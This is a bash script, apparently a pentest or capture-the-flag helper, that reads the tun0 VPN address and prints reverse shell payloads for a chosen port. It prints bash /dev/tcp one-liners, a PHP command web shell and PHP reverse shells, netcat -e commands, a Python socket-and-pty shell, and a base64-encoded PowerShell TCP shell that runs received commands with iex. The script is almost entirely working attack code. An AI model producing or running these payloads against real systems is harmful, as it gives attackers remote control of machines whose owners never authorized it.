#!/bin/bash

RED="\e[31m"
BLUE="\e[34m"
YELLOW="\e[33m"
ENDCOLOR="\e[0m"

function usage() {
    echo -e "\nUsage: revshell (bash | php | nc | python | powershell) <port>"
}

if [[ "$#" -ne 2 ]]; then
    echo -e "${RED}[x]${ENDCOLOR} Error: Incorrect arguments provided"
    usage
    exit 1
fi

IP=$(ip a | grep "tun0" | xargs | cut -d ' ' -f 15 | cut -d '/' -f 1)

if [[ "$1" == "bash" ]]; then
    echo -e "\n${BLUE}[+]${ENDCOLOR} Bash reverse shell payloads generated:\n"

    echo -e "\t${YELLOW}-${ENDCOLOR} bash -i >& /dev/tcp/$IP/$2 0>&1"
    echo -e "\t${YELLOW}-${ENDCOLOR} bash -c 'bash -i >& /dev/tcp/$IP/$2 0>&1'"

elif [[ "$1" == "php" ]]; then
    echo -e "\n${BLUE}[+]${ENDCOLOR} PHP shell payloads generated:\n"

    echo -e "\t${YELLOW}-${ENDCOLOR} <?php if(isset(\$_REQUEST[\"cmd\"])){ echo \"<pre>\"; \$cmd = (\$_REQUEST[\"cmd\"]); system(\$cmd); echo \"</pre>\"; die; }?>"
    echo -e "\t${YELLOW}-${ENDCOLOR} <?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/$IP/$2 0>&1'\");"
    echo -e "\t${YELLOW}-${ENDCOLOR} <?php \$s = stream_socket_client(\"tcp://$IP:$2\"); proc_open(\"/bin/sh -i\", [0=>\$s,1=>\$s,2=>\$s],\$pipes);?>"

elif [[ "$1" == "nc" ]]; then
    echo -e "\n${BLUE}[+]${ENDCOLOR} Netcat reverse shell payloads generated:\n"

    echo -e "\t${YELLOW}-${ENDCOLOR} nc $IP $2 -e sh"
    echo -e "\t${YELLOW}-${ENDCOLOR} nc.exe $IP $2 -e cmd.exe"

elif [[ "$1" == "python" ]]; then
    echo -e "\n${BLUE}[+]${ENDCOLOR} Python reverse shell payloads generated:\n"

    echo -e "\t${YELLOW}-${ENDCOLOR} python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$IP\",$2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'"
elif [[ "$1" == "powershell" ]]; then
    echo -e "\n${BLUE}[+]${ENDCOLOR} PowerShell reverse shell payloads generated:\n"

    # shellcheck disable=SC2016
    payload=$(echo -n '$client = New-Object System.Net.Sockets.TCPClient("'"$IP"'",'"$2"');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF-8 -t UTF-16LE | base64 -w 0)
    echo -e "\t${YELLOW}-${ENDCOLOR} powershell -e $payload"

else
    echo -e "${RED}[x]${ENDCOLOR} Error: Invalid option"
    usage
    exit 1
fi
